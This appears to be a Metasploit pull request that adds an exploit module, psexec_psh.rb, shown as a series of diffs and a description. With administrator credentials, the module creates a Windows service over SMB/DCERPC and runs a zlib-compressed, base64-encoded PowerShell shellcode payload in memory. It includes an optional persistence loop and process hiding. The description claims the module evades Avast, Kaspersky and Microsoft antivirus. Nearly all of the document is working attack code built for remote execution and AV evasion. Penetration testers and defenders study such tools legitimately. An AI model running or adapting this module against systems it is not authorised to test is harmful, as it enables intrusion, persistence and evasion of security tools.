### PR TITLE
Add disk-less AV bypass PSExec module using PSH

### DIFF
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,22 +1,14 @@
 # -*- coding: binary -*-
-#!/usr/bin/env ruby
-
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
     Rank = ManualRanking
 
-	# # Exploit mixins should be called first
-	# include Msf::Exploit::Remote::SMB
-	# include Msf::Exploit::Remote::SMB::Authenticated
-	# include Msf::Auxiliary::Report
-	# include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB
   include Msf::Exploit::Remote::SMB::Authenticated
   include Msf::Auxiliary::Report
   include Msf::Exploit::EXE
-  # include Msf::Exploit::WbemExec
 
 
 	# Aliases for common classes
@@ -83,27 +75,27 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-  def exploit
-    command = prep_psh_payload
+	def exploit
+		# Build the script
+		command = prep_psh_payload
 
-		#Try and authenticate with given credentials
+	    	# Try and authenticate with given credentials
 		if connect
-			begin
+	    		begin
 				smb_login
 			rescue StandardError => autherror
 				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
 				return
-			end
-      # Execute the powershell command
-      begin
-        print_status("#{peer} - Executing the payload...")
-        vprint_good(command)
-        return psexec(command)
-      rescue StandardError => exec_command_error
-        print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
-        return false
-      end
-			disconnect
+		    	end
+		    	# Execute the powershell command
+	    		begin
+		    		print_status("#{peer} - Executing the payload...")
+		    		return psexec(command)
+	    		rescue StandardError => exec_command_error
+		    		print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+		    		return false
+		    	end
+		    	disconnect
 		end
 	end
 

--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -270,6 +270,6 @@ class Metasploit3 < Msf::Exploit::Remote
     psh_payload = compress_script(psh_payload)
     # Determine appropriate architecture
     ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-    command = "%COMSPEC% /C #{ps_bin} -EncodedCommand #{psh_payload}"
+    command = "%COMSPEC% /C start #{ps_bin} -EncodedCommand #{psh_payload}"
   end
 end

--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,0 +1,283 @@
+# -*- coding: binary -*-
+#!/usr/bin/env ruby
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+    Rank = ManualRanking
+
+	# # Exploit mixins should be called first
+	# include Msf::Exploit::Remote::SMB
+	# include Msf::Exploit::Remote::SMB::Authenticated
+	# include Msf::Auxiliary::Report
+	# include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB
+  include Msf::Exploit::Remote::SMB::Authenticated
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::EXE
+  # include Msf::Exploit::WbemExec
+
+
+	# Aliases for common classes
+	SIMPLE = Rex::Proto::SMB::SimpleClient
+	XCEPT  = Rex::Proto::SMB::Exceptions
+	CONST  = Rex::Proto::SMB::Constants
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
+			'Description'    => %q{
+					This module uses a valid administrator username and password to execute a powershell
+        payload using a similar technique to the "psexec" utility provided by SysInternals. The
+        payload is encoded in base64 and executed from the commandline using the -encodedcommand
+        flag. Using this method, the payload is never written to disk, and given that each payload
+        is unique, is not prone to signature based detection. Since executing shellcode in .NET
+        requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
+        must match that of the payload. Lastly, a persist option is provided to execute the payload
+        in a while loop in order to maintain a form of persistence. In the event of a sandbox
+        observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+			},
+
+			'Author'         => [
+				'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
+        'RageLtMan <rageltman[at]sempervictus' # PSH exploit
+			],
+
+			'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'WfsDelay'     => 10,
+          'EXITFUNC' => 'thread'
+        },
+      'Payload'        =>
+        {
+          'Space'        => 8192,
+          'DisableNops'  => true,
+          'StackAdjustment' => -3500
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+        ],
+      'DefaultTarget'  => 0,
+			'References'     => [
+				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+				[ 'OSVDB', '3106'],
+				[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
+				[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
+				[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
+			]
+		))
+
+    register_options([
+      OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
+      OptBool.new('RUN_WOW64', [
+              false,
+              'Execute powershell in 32bit compatibility mode, payloads need native arch',
+              false
+      ]),
+    ], self.class)
+	end
+
+
+  def exploit
+    command = prep_psh_payload
+
+		#Try and authenticate with given credentials
+		if connect
+			begin
+				smb_login
+			rescue StandardError => autherror
+				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
+				return
+			end
+      # Execute the powershell command
+      begin
+        print_status("#{peer} - Executing the payload...")
+        vprint_good(command)
+        return psexec(command)
+      rescue StandardError => exec_command_error
+        print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+        return false
+      end
+			disconnect
+		end
+	end
+
+	# This code was stolen straight out of psexec.rb.  Thanks very much HDM and all who contributed to that module!!
+	# Instead of uploading and runing a binary.  This method runs a single windows command fed into the COMMAND paramater
+	def psexec(command)
+
+		simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
+
+		handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
+		vprint_status("#{peer} - Binding to #{handle} ...")
+		dcerpc_bind(handle)
+		vprint_status("#{peer} - Bound to #{handle} ...")
+
+		vprint_status("#{peer} - Obtaining a service manager handle...")
+		scm_handle = nil
+		stubdata =
+			NDR.uwstring("\\\\#{rhost}") +
+			NDR.long(0) +
+			NDR.long(0xF003F)
+		begin
+			response = dcerpc.call(0x0f, stubdata)
+			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+				scm_handle = dcerpc.last_response.stub_data[0,20]
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+			return false
+		end
+
+		servicename = Rex::Text.rand_text_alpha(11)
+		displayname = Rex::Text.rand_text_alpha(16)
+		holdhandle = scm_handle
+		svc_handle  = nil
+		svc_status  = nil
+
+		stubdata =
+			scm_handle +
+			NDR.wstring(servicename) +
+			NDR.uwstring(displayname) +
+
+			NDR.long(0x0F01FF) + # Access: MAX
+			NDR.long(0x00000110) + # Type: Interactive, Own process
+			NDR.long(0x00000003) + # Start: Demand
+			NDR.long(0x00000000) + # Errors: Ignore
+			NDR.wstring( command ) +
+			NDR.long(0) + # LoadOrderGroup
+			NDR.long(0) + # Dependencies
+			NDR.long(0) + # Service Start
+			NDR.long(0) + # Password
+			NDR.long(0) + # Password
+			NDR.long(0) + # Password
+			NDR.long(0)  # Password
+		begin
+			vprint_status("#{peer} - Creating the service...")
+			response = dcerpc.call(0x0c, stubdata)
+			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+				svc_handle = dcerpc.last_response.stub_data[0,20]
+				svc_status = dcerpc.last_response.stub_data[24,4]
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+			return false
+		end
+
+		vprint_status("#{peer} - Closing service handle...")
+		begin
+			response = dcerpc.call(0x0, svc_handle)
+		rescue ::Exception
+		end
+
+		vprint_status("#{peer} - Opening service...")
+		begin
+			stubdata =
+				scm_handle +
+				NDR.wstring(servicename) +
+				NDR.long(0xF01FF)
+
+			response = dcerpc.call(0x10, stubdata)
+			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+				svc_handle = dcerpc.last_response.stub_data[0,20]
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+			return false
+		end
+
+		vprint_status("#{peer} - Starting the service...")
+		stubdata =
+			svc_handle +
+			NDR.long(0) +
+			NDR.long(0)
+		begin
+			response = dcerpc.call(0x13, stubdata)
+			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+			return false
+		end
+
+		vprint_status("#{peer} - Removing the service...")
+		stubdata =
+			svc_handle
+		begin
+			response = dcerpc.call(0x02, stubdata)
+			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+			end
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+		end
+
+		vprint_status("#{peer} - Closing service handle...")
+		begin
+			response = dcerpc.call(0x0, svc_handle)
+		rescue ::Exception => e
+			print_error("#{peer} - Error: #{e}")
+		end
+
+		select(nil, nil, nil, 1.0)
+		simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
+		return true
+	end
+
+  # Return a zlib compressed powershell script
+  def compress_script(script_in)
+
+    # Compress using the Deflate algorithm
+    compressed_stream = ::Zlib::Deflate.deflate(script_in,
+      ::Zlib::BEST_COMPRESSION)
+
+    # Base64 encode the compressed file contents
+    encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+    # Build the powershell expression
+    # Decode base64 encoded command and create a stream object
+    psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+    psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
+    # Read & delete the first two bytes due to incompatibility with MS
+    psh_expression += "$stream.ReadByte()|Out-Null;"
+    psh_expression += "$stream.ReadByte()|Out-Null;"
+    # Uncompress and invoke the expression (execute)
+    psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
+    psh_expression += "$(New-Object IO.Compression.DeflateStream("
+    psh_expression += "$stream,"
+    psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
+    psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
+
+    # Convert expression to unicode
+    unicode_expression = Rex::Text.to_unicode(psh_expression)
+
+    # Base64 encode the unicode expression
+    encoded_expression = Rex::Text.encode_base64(unicode_expression)
+
+    return encoded_expression
+  end
+
+  def peer
+    return "#{rhost}:#{rport}"
+  end
+
+  # Return a command-line payload configured per datastore
+  def prep_psh_payload
+    psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.raw)
+    # Run our payload in a while loop
+    if datastore['PERSIST']
+      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
+      sleep_time = rand(5)+5
+      psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
+    end
+    # Convert to base64 for -encodedcommand execution
+    psh_payload = compress_script(psh_payload)
+    # Determine appropriate architecture
+    ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+    command = "%COMSPEC% /C #{ps_bin} -EncodedCommand #{psh_payload}"
+  end
+end

--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -270,6 +270,6 @@ class Metasploit3 < Msf::Exploit::Remote
     psh_payload = compress_script(psh_payload)
     # Determine appropriate architecture
     ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-    command = "%COMSPEC% /C start #{ps_bin} -EncodedCommand #{psh_payload}"
+    command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}"
   end
 end

--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,18 +1,17 @@
 # -*- coding: binary -*-
-#!/usr/bin/env ruby
 
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-    Rank = ManualRanking
+		Rank = ManualRanking
 
 	# Exploit mixins should be called first
-  include Msf::Exploit::Remote::DCERPC
-  include Msf::Exploit::Remote::SMB
-  include Msf::Exploit::Remote::SMB::Authenticated
-  include Msf::Exploit::Powershell
-  include Msf::Auxiliary::Report
-  include Msf::Exploit::EXE
+	include Msf::Exploit::Remote::DCERPC
+	include Msf::Exploit::Remote::SMB
+	include Msf::Exploit::Remote::SMB::Authenticated
+	include Msf::Exploit::Powershell
+	include Msf::Auxiliary::Report
+	include Msf::Exploit::EXE
 
 	# Aliases for common classes
 	SIMPLE = Rex::Proto::SMB::SimpleClient
@@ -24,40 +23,42 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
 			'Description'    => %q{
 					This module uses a valid administrator username and password to execute a powershell
-        payload using a similar technique to the "psexec" utility provided by SysInternals. The
-        payload is encoded in base64 and executed from the commandline using the -encodedcommand
-        flag. Using this method, the payload is never written to disk, and given that each payload
-        is unique, is not prone to signature based detection. Since executing shellcode in .NET
-        requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
-        must match that of the payload. Lastly, a persist option is provided to execute the payload
-        in a while loop in order to maintain a form of persistence. In the event of a sandbox
-        observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+				payload using a similar technique to the "psexec" utility provided by SysInternals. The
+				payload is encoded in base64 and executed from the commandline using the -encodedcommand
+				flag. Using this method, the payload is never written to disk, and given that each payload
+				is unique, is not prone to signature based detection. Since executing shellcode in .NET
+				requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
+				must match that of the payload. Lastly, a persist option is provided to execute the payload
+				in a while loop in order to maintain a form of persistence. In the event of a sandbox
+				observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+				In order to avoid interactive process notifications for the current user, the psh payload has
+				been reduced in size and wrapped in a powershell invocation which hides the process entirely.
 			},
 
 			'Author'         => [
 				'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
-        'RageLtMan <rageltman[at]sempervictus' # PSH exploit
+				'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
 			],
 
 			'License'        => MSF_LICENSE,
-      'Privileged'     => true,
-      'DefaultOptions' =>
-        {
-          'WfsDelay'     => 10,
-          'EXITFUNC' => 'thread'
-        },
-      'Payload'        =>
-        {
-          'Space'        => 8192,
-          'DisableNops'  => true,
-          'StackAdjustment' => -3500
-        },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ],
-        ],
-      'DefaultTarget'  => 0,
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'WfsDelay'     => 10,
+					'EXITFUNC' => 'thread'
+				},
+			'Payload'        =>
+				{
+					'Space'        => 8192,
+					'DisableNops'  => true,
+					'StackAdjustment' => -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0,
 			'References'     => [
 				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
 				[ 'OSVDB', '3106'],
@@ -67,20 +68,20 @@ class Metasploit3 < Msf::Exploit::Remote
 			]
 		))
 
-    register_options([
-      OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
-      OptBool.new('RUN_WOW64', [
-              false,
-              'Execute powershell in 32bit compatibility mode, payloads need native arch',
-              false
-      ]),
-      OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
-    ], self.class)
+		register_options([
+			OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
+			OptBool.new('RUN_WOW64', [
+							false,
+							'Execute powershell in 32bit compatibility mode, payloads need native arch',
+							false
+			]),
+			OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
+		], self.class)
 	end
 
 
-  def exploit
-    command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
+	def exploit
+		command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
 
 		#Try and authenticate with given credentials
 		if connect
@@ -90,15 +91,15 @@ class Metasploit3 < Msf::Exploit::Remote
 				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
 				return
 			end
-      # Execute the powershell command
-      begin
-        print_status("#{peer} - Executing the payload...")
-        #vprint_good(command)
-        return psexec(command)
-      rescue StandardError => exec_command_error
-        print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
-        return false
-      end
+			# Execute the powershell command
+			begin
+				print_status("#{peer} - Executing the payload...")
+				vprint_good(command)
+				return psexec(command)
+			rescue StandardError => exec_command_error
+				print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+				return false
+			end
 			disconnect
 		end
 	end
@@ -224,8 +225,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		return true
 	end
 
-  def peer
-    return "#{rhost}:#{rport}"
-  end
+	def peer
+		return "#{rhost}:#{rport}"
+	end
 
 end

--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,15 +1,18 @@
 # -*- coding: binary -*-
+#!/usr/bin/env ruby
+
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
     Rank = ManualRanking
 
+	# Exploit mixins should be called first
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB
   include Msf::Exploit::Remote::SMB::Authenticated
+  include Msf::Exploit::Powershell
   include Msf::Auxiliary::Report
   include Msf::Exploit::EXE
-
 
 	# Aliases for common classes
 	SIMPLE = Rex::Proto::SMB::SimpleClient
@@ -71,31 +74,32 @@ class Metasploit3 < Msf::Exploit::Remote
               'Execute powershell in 32bit compatibility mode, payloads need native arch',
               false
       ]),
+      OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
     ], self.class)
 	end
 
 
-	def exploit
-		# Build the script
-		command = prep_psh_payload
+  def exploit
+    command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
 
-	    	# Try and authenticate with given credentials
+		#Try and authenticate with given credentials
 		if connect
-	    		begin
+			begin
 				smb_login
 			rescue StandardError => autherror
 				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
 				return
-		    	end
-		    	# Execute the powershell command
-	    		begin
-		    		print_status("#{peer} - Executing the payload...")
-		    		return psexec(command)
-	    		rescue StandardError => exec_command_error
-		    		print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
-		    		return false
-		    	end
-		    	disconnect
+			end
+      # Execute the powershell command
+      begin
+        print_status("#{peer} - Executing the payload...")
+        #vprint_good(command)
+        return psexec(command)
+      rescue StandardError => exec_command_error
+        print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+        return false
+      end
+			disconnect
 		end
 	end
 
@@ -220,56 +224,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		return true
 	end
 
-  # Return a zlib compressed powershell script
-  def compress_script(script_in)
-
-    # Compress using the Deflate algorithm
-    compressed_stream = ::Zlib::Deflate.deflate(script_in,
-      ::Zlib::BEST_COMPRESSION)
-
-    # Base64 encode the compressed file contents
-    encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-    # Build the powershell expression
-    # Decode base64 encoded command and create a stream object
-    psh_expression =  "$stream = New-Object IO.MemoryStream(,"
-    psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
-    # Read & delete the first two bytes due to incompatibility with MS
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    # Uncompress and invoke the expression (execute)
-    psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
-    psh_expression += "$(New-Object IO.Compression.DeflateStream("
-    psh_expression += "$stream,"
-    psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
-    psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
-
-    # Convert expression to unicode
-    unicode_expression = Rex::Text.to_unicode(psh_expression)
-
-    # Base64 encode the unicode expression
-    encoded_expression = Rex::Text.encode_base64(unicode_expression)
-
-    return encoded_expression
-  end
-
   def peer
     return "#{rhost}:#{rport}"
   end
 
-  # Return a command-line payload configured per datastore
-  def prep_psh_payload
-    psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.raw)
-    # Run our payload in a while loop
-    if datastore['PERSIST']
-      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-      sleep_time = rand(5)+5
-      psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
-    end
-    # Convert to base64 for -encodedcommand execution
-    psh_payload = compress_script(psh_payload)
-    # Determine appropriate architecture
-    ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-    command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}"
-  end
 end


### PR DESCRIPTION
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.

In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.

This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.

Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
